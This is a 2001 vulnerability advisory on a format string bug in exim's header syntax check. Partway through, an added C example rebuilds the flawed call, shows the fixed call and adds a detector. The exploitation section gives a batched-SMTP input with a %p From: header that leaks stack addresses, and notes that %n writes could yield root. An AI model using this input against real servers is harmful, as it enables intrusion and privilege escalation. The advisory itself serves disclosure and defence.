SECURITYVULNS:DOC:1695
Jun 07, 2001

lil' exim format bug


Hi BugTrackers

Just a little bug to report:

THE BUG

accept.c, line 2506:
else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is declared like this:
moan_smtp_batch(char *cmd_buffer, char *format, ...)

So when smtp_reply contains printf conversion specifiers (%p, %s, %n ...),
moan_smtp_batch() interprets smtp_reply as its format string and expands them.
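To make the pattern concrete, here is an added C example (not exim code; the function names and the 550 reply text are modelled on the lines quoted above, while the `reply_fixed()` variant and the `count_conversions()` helper are assumptions of this example). It shows a function with the same shape as moan_smtp_batch() called the way accept.c calls it, beside the corrected call that passes smtp_reply as an argument to a constant "%s" format, and a small check that flags header values carrying conversion specifiers such as the %p probe used later in this post:

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stands in for the reply moan_smtp_batch() would write out, so the
 * result can be inspected by the caller (example-only). */
static char last_reply[512];

/* Same shape as exim's moan_smtp_batch(char *cmd_buffer, char *format, ...):
 * whatever arrives as the second argument becomes a printf format. */
static void moan_smtp_batch(const char *cmd_buffer, const char *format, ...)
{
    va_list ap;
    (void)cmd_buffer;
    va_start(ap, format);
    vsnprintf(last_reply, sizeof last_reply, format, ap);
    va_end(ap);
}

/* Builds the reply the header syntax check produces; the From: value is
 * copied in verbatim, so any '%' the sender put there survives into smtp_reply. */
static void build_smtp_reply(const char *from_value, char *smtp_reply, size_t n)
{
    snprintf(smtp_reply, n,
             "550 Syntax error in 'From' header: domain missing or malformed: "
             "failing address is: %s", from_value);
}

/* The pattern from accept.c: smtp_reply lands in the format slot, so the
 * sender's conversion specifiers are interpreted (undefined behaviour once
 * they start consuming non-existent varargs). */
const char *reply_vulnerable(const char *from_value)
{
    char smtp_reply[256];
    build_smtp_reply(from_value, smtp_reply, sizeof smtp_reply);
    moan_smtp_batch(NULL, smtp_reply);
    return last_reply;
}

/* The fix (assumed here): a constant format, untrusted text as an argument. */
const char *reply_fixed(const char *from_value)
{
    char smtp_reply[256];
    build_smtp_reply(from_value, smtp_reply, sizeof smtp_reply);
    moan_smtp_batch(NULL, "%s", smtp_reply);
    return last_reply;
}

/* Counts conversion specifiers ('%' not followed by '%') in a header value.
 * A non-zero count in a From:/To: value is the kind of probe shown below. */
int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }   /* "%%" is a literal percent */
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed inputs: the post's %p probe, and a "%%" value that shows
     * the format interpretation without reading any missing varargs. */
    const char *probe = "@@%p%p%p%p%p%p%p%p%p%p";
    printf("conversions in probe: %d\n", count_conversions(probe));
    printf("vulnerable:   %s\n", reply_vulnerable("@@%%x"));  /* "%%" collapses to "%" */
    printf("fixed:        %s\n", reply_fixed("@@%%x"));       /* value kept verbatim  */
    printf("fixed, probe: %s\n", reply_fixed(probe));         /* %p stays literal     */
    return 0;
}
```

Note that the vulnerable function body is identical in both paths; the only difference is the call site, which is exactly the one-line change the accept.c snippet needs. Compiling with -Wformat-security, or declaring the function with `__attribute__((format(printf, 2, 3)))`, makes the compiler flag the non-literal format call.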

Why do I call it a little bug?

This piece of code is only executed when exim is configured to check the
syntax of incoming mails' headers, i.e. /etc/exim.conf has the option
headers_check_syntax
set.

By default it's turned OFF, and only a few people turn it on.

So it's NOT vulnerable BY DEFAULT.

Exploitation:

Try this (exim -bS reads batched SMTP from standard input):
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the responses you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change the %p's to %s's, you get a segfault. With a carefully constructed
string it's easy to overwrite the saved eip with %n's and get root out of this bug.

No exploit yet, but after the many local format bug exploits it's not a big job
for a skilled person to write one.

Megyer Laszlo (Lez)
[email protected]